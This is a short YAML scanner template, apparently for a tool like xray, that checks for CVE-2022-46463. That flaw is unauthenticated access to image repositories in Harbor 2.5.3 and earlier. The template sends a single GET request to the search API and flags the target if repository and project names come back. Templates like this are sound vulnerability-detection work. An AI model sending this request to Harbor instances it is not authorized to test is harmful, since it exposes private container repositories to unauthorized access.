id: CVE-2022-46463

info:
  name: Harbor <=2.5.3 - Unauthorized Access
  author: Arm!tage
  severity: high
  verified: true
  description: |
    An access control issue in Harbor v1.X.X to v2.5.3 allows attackers to access public and private image repositories without authentication
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-46463

rules:
  r0:
    request:
      method: GET
      path: /api/v2.0/search?q=/
    expression: response.status == 200 && response.body.bcontains(b'repository_name') && response.body.bcontains(b'project_name')
expression: r0()
